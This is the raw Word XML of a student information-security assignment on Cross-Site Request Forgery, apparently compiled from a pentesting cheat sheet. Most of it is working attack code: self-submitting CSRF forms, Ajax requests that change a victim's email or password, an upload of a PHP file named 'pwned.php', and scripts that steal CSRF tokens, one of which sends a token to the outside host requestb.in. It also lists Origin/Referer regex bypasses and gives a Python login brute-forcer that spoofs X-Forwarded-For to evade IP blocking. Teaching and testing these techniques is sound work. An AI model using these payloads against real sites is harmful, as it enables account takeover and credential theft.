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9" w:dyaOrig="2174">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000000" style="width:210.950000pt;height:10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Information Security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 Zaid Ali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BSCS-18-57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 th semester morning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44"/>
          <w:u w:val="single"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Request Forgery(CSRF) Attack Lab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Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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Cross-Site Request Forgery (CSRF) Attack Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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Zaid Ali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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7"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">11-11-2021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Content-Type change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According to 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this</w:t>
        </w:r>
      </w:hyperlink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, in order to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avoid preflight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requests using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POST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method these are the allowed Content-Type values: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F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application/x-www-form-urlencoded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F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multipart/form-data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F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text/plain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However, note that the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severs logic may vary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depending on the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Content-Type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used so you should try the values mentioned and others like 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application/json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:color w:val="24292F"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">,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text/xml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application/xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
          <w:i/>
          <w:color w:val="24292F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  <w:t xml:space="preserve">application/json preflight request bypass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As you already know, you cannot sent a POST request with the Content-Type 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application/json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via HTML form, and if you try to do so via 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XMLHttpRequest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a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preflight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request is sent first.</w:t>
        <w:br/>
        <w:t xml:space="preserve">However, you could try to send the JSON data using the content types **</w:t>
      </w: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text/plain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application/x-www-form-urlencoded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**just to check if the backend is using the data independently of the Content-Type.</w:t>
        <w:br/>
        <w:t xml:space="preserve">You can send a form using </w:t>
      </w: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Content-Type: text/plain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setting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b/>
          <w:color w:val="24292F"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">enctype="text/plain"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You could also try to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bypass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this restriction by using a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SWF flash file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. More more information </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId3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read this post</w:t>
        </w:r>
      </w:hyperlink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Referrer / Origin check bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:keepLines w:val="true"/>
        <w:spacing w:before="360" w:after="240" w:line="259"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
          <w:i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i/>
          <w:color w:val="24292F"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid Referrer header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Some applications validate the Referer header when it is present in requests but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skip the validation if the header is omitted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&lt;meta name="referrer" content="never"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:keepLines w:val="true"/>
        <w:spacing w:before="360" w:after="240" w:line="259"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
          <w:i/>
          <w:color w:val="24292F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i/>
          <w:color w:val="24292F"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Regexp bypasses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4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https://hahwul.com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5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https://hahwul.com?white_domain_com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6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https://hahwul.com;white_domain_com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7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https://hahwul.com/white_domain_com/../target.file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8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https://white_domain_com.hahwul.com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9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https://hahwulwhite_domain_com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0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file://123.white_domain_com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(X)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https://white_domain_com@hahwul.com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2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https://hahwul.com#white_domain_com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3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https://hahwul.com\.white_domain_com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4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https://hahwul.com/.white_domain_com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(X)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6"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Examples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Exfiltrating CSRF Token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If a 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24"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF token</w:t>
      </w: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is being used as **defence **you could try to **exfiltrate it **abusing a </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId15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XSS</w:t>
        </w:r>
      </w:hyperlink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vulnerability or a </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId16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Dangling Markup</w:t>
        </w:r>
      </w:hyperlink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 vulnerability.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GET using HTML tags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&lt;img src="http://google.es?param=VALUE" style="display:none"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&lt;h1&gt;404 - Page not found&lt;/h1&gt;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The URL you are requesting is no longer available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Other HTML5 tags that can be used to automatically send a GET request are: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object w:dxaOrig="4104" w:dyaOrig="3787">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000001" style="width:205.200000pt;height:189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7"/>
        </w:objec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Form GET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&lt;!-- CSRF PoC - generated by Burp Suite Professional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&lt;script&gt;history.pushState('', '', '/')&lt;/script&gt;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&lt;form method="GET" action="https://victim.net/email/change-email"&gt;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&lt;input type="hidden" name="email" value="some@email.com"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&lt;input type="submit" value="Submit request"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&lt;/form&gt;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document.forms[0].submit();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&lt;/html&gt;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Form POST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&lt;script&gt;history.pushState('', '', '/')&lt;/script&gt;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&lt;form action="https://victim.net/email/change-email" id="csrfform"&gt;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&lt;input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /&gt; &lt;!-- Way 1 to autosubmit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&lt;input type="submit" value="Submit request"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&lt;img src=x onerror="csrfform.submit();" /&gt; &lt;!-- Way 2 to autosubmit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&lt;/form&gt;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document.forms[0].submit(); //Way 3 to autosubmit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&lt;/html&gt;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Form POST request through iframe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&lt;!--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The request is sent through the iframe withuot reloading the page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&lt;iframe style="display:none" name="csrfframe"&gt;&lt;/iframe&gt;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&lt;form action="/change-email" id="csrfform" target="csrfframe"&gt;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&lt;input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();"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&lt;input type="submit" value="Submit request"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&lt;/form&gt;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document.forms[0].submit();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&lt;/html&gt;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Ajax POST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xh;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if (window.XMLHttpRequest)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{// code for IE7+, Firefox, Chrome, Opera, Safari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xh=new XMLHttpRequest();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{// code for IE6, IE5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xh=new ActiveXObject("Microsoft.XMLHTTP");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xh.withCredentials = true;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xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");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xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)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xh.send("username=abcd&amp;status=on");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//JQuery version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$.ajax({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type: "POST",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url: "</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId19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https://google.com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data: "param=value&amp;param2=value2"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multipart/form-data POST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myFormData = new FormData();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blob = new Blob(["&lt;?php phpinfo(); ?&gt;"], { type: "text/text"});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myFormData.append("newAttachment", blob, "pwned.php");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fetch("http://example/some/path",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method: "post",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body: myFormData,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credentials: "include",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headers: {"Content-Type": "application/x-www-form-urlencoded"},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mode: "no-cors"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});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multipart/form-data POST request v2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fileSize = fileData.length,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boundary = "OWNEDBYOFFSEC",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xhr = new XMLHttpRequest();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xhr.withCredentials = true;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xhr.open("POST", url, true);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//  MIME POST request.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xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);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xhr.setRequestHeader("Content-Length", fileSize);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body = "--" + boundary + "\r\n";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body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';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body += "Content-Type: " + ctype + "\r\n\r\n";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body += fileData + "\r\n";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body += "--" + boundary + "--";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//xhr.send(body);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xhr.sendAsBinary(body);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Form POST request from within an iframe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&lt;--! expl.html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&lt;body onload="envia()"&gt;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&lt;form method="POST"id="formulario" action="http://aplicacion.example.com/cambia_pwd.php"&gt;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&lt;input type="text" id="pwd" name="pwd" value="otra nueva"&gt;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&lt;/form&gt;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envia(){document.getElementById("formulario").submit();}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&lt;!-- public.html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&lt;iframe src="2-1.html" style="position:absolute;top:-5000"&gt;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&lt;/iframe&gt;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&lt;h1&gt;Sitio bajo mantenimiento. Disculpe las molestias&lt;/h1&gt;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Steal CSRF Token and send a POST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submitFormWithTokenJS(token)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var xhr = new XMLHttpRequest();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xhr.open("POST", POST_URL, true);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xhr.withCredentials = true;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// Send the proper header information along with the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xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");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// This is for debugging and can be removed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xhr.onreadystatechange = function()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if(xhr.readyState === XMLHttpRequest.DONE &amp;&amp; xhr.status === 200)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//console.log(xhr.responseText);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xhr.send("token=" + token + "&amp;otherparama=heyyyy");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getTokenJS()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var xhr = new XMLHttpRequest();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// This tels it to return it as a HTML document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xhr.responseType = "document";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xhr.withCredentials = true;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// true on the end of here makes the call asynchronous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xhr.open("GET", GET_URL, true);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xhr.onload = function (e)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if (xhr.readyState === XMLHttpRequest.DONE &amp;&amp; xhr.status === 200)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// Get the document from the response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page = xhr.response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// Get the input element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input = page.getElementById("token");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// Show the token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//console.log("The token is: " + input.value);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// Use the token to submit the form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    submitFormWithTokenJS(input.value);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// Make the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xhr.send(null);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GET_URL="http://google.com?param=VALUE"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POST_URL="http://google.com?param=VALUE"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getTokenJS();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Steal CSRF Token and send a Post request using an iframe, a form and Ajax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&lt;form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data"&gt;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&lt;input type="text" name="username" value="AA"&gt;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&lt;input type="checkbox" name="status" checked="checked"&gt;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&lt;input id="token" type="hidden" name="token" value=""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&lt;/form&gt;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 type="text/javascript"&gt;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f1(){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x1=document.getElementById("i1");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x1d=(x1.contentWindow||x1.contentDocument);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t=x1d.document.getElementById("token").value;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document.getElementById("token").value=t;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document.getElementById("form1").submit();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&lt;iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"&gt;&lt;/iframe&gt;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Steal CSRF Token and sen a POST request using an iframe and a form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&lt;iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"&gt;&lt;/iframe&gt;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read()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var name = 'admin2';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var token = document.getElementById("iframe").contentDocument.forms[0].token.value;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document.writeln('&lt;form width="0" height="0" method="post" action="http://www.yoursebsite.com/check.php"  enctype="multipart/form-data"&gt;');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document.writeln('&lt;input id="username" type="text" name="username" value="' + name + '" /&gt;&lt;br /&gt;');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document.writeln('&lt;input id="token" type="hidden" name="token" value="' + token + '" /&gt;');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document.writeln('&lt;input type="submit" name="submit" value="Submit" /&gt;&lt;br/&gt;');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document.writeln('&lt;/form&gt;');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document.forms[0].submit.click();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Steal token and send it using 2 iframes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token;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readframe1(){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token = frame1.document.getElementById("profile").token.value;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document.getElementById("bypass").token.value = token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loadframe2();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loadframe2(){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var test = document.getElementbyId("frame2");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test.src = "</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId20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http://requestb.in/1g6asbg1?token=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"+token;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&lt;iframe id="frame1" name="frame1" src="http://google.com?param=VALUE" onload="readframe1()"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sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"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height="600" width="800"&gt;&lt;/iframe&gt;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&lt;iframe id="frame2" name="frame2"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sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"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height="600" width="800"&gt;&lt;/iframe&gt;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&lt;body onload="document.forms[0].submit()"&gt;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&lt;form id="bypass" name"bypass" method="POST" target="frame2" action="http://google.com?param=VALUE" enctype="multipart/form-data"&gt;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&lt;input type="text" name="username" value="z"&gt;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&lt;input type="checkbox" name="status" checked=""&gt;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&lt;input id="token" type="hidden" name="token" value="0000"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&lt;button type="submit"&gt;Submit&lt;/button&gt;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&lt;/form&gt;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POSTSteal CSRF token with Ajax and send a post with a form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&lt;body onload="getData()"&gt;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&lt;form id="form" action="http://google.com?param=VALUE" method="POST" enctype="multipart/form-data"&gt;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&lt;input type="hidden" name="username" value="root"/&gt;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&lt;input type="hidden" name="status" value="on"/&gt;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&lt;input type="hidden" id="findtoken" name="token" value=""/&gt;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&lt;input type="submit" value="valider"/&gt;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&lt;/form&gt;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var x = new XMLHttpRequest();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function getData()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x.withCredentials = true;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x.open("GET","http://google.com?param=VALUE",true);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x.send(null);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x.onreadystatechange = function()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if (x.readyState == XMLHttpRequest.DONE)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var token = x.responseText.match(/name="token" value="(.+)"/)[1];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document.getElementById("findtoken").value = token;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document.getElementById("form").submit();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0"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF with Socket.IO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 src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"&gt;&lt;/script&gt;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let socket = io('http://six.jh2i.com:50022/test');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const username = 'admin'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socket.on('connect', () =&gt;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console.log('connected!');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socket.emit('join',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room: username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});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socket.emit('my_room_event',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data: '!flag',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room: username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});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4BACC6"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="36"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF Login Brute Force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The code can be used to Brut Force a login form using a CSRF token (It's also using the header X-Forwarded-For to try to bypass a possible IP blacklisting):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import request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import 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import random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URL = "</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId21">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
            <w:color w:val="24292F"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">http://10.10.10.191/admin/</w:t>
        </w:r>
      </w:hyperlink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PROXY = { "http": "127.0.0.1:8080"}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SESSION_COOKIE_NAME = "BLUDIT-KEY"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USER = "fergus"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PASS_LIST="./words"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def init_session():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#Return CSRF + Session (cookie)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r = requests.get(URL)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csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)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csrf = csrf.group(1)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session_cookie = r.cookies.get(SESSION_COOKIE_NAME)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return csrf, session_cookie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def login(user, password):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print(f"{user}:{password}")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csrf, cookie = init_session()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cookies = {SESSION_COOKIE_NAME: cookie}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data =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"tokenCSRF": csrf,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"username": user,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"password": password,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"save": ""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headers =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"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"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r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)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if "Username or password incorrect" in r.text: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return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else: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print(f"FOUND {user} : {password}")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return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with open(PASS_LIST, "r") as f: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for line in f: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0"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">        login(USER, line.strip())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4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b/>
          <w:color w:val="4BACC6"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="32"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b/>
          <w:color w:val="4BACC6"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="32"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Repository: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22">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
            <w:b/>
            <w:color w:val="4BACC6"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="32"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/mynameiszaid/Assignment-IS---Cross-Site-Request-Forgery-CSRF-Attack-Lab.docx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1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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="styles.xml" Id="docRId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" /><Relationship TargetMode="External" Target="https://hahwul.com/target.file" Id="docRId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://hahwul.com/.white_domain_com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s://hahwul.com;white_domain_com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github.com/carlospolop/hacktricks/blob/master/pentesting-web/xss-cross-site-scripting/" Id="docRId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://github.com/mynameiszaid/Assignment-IS---Cross-Site-Request-Forgery-CSRF-Attack-Lab.docx" Id="docRId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://hahwulwhite_domain_com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hahwul.com/#white_domain_com" Id="docRId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/dangling-markup-html-scriptless-injection.md" Id="docRId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://10.10.10.191/admin/" Id="docRId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://hahwul.com/" Id="docRId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://white_domain_com.hahwul.com/" Id="docRId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://hahwul.com/.white_domain_com" Id="docRId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://requestb.in/1g6asbg1?token=" Id="docRId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937" Id="docRId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="file://\\123.white_domain_com\" Id="docRId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image1.wmf" Id="docRId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS" Id="docRId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://white_domain_com@hahwul.com/" Id="docRId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://google.com/" Id="docRId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://hahwul.com/?white_domain_com" Id="docRId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /></Relationships>
</file>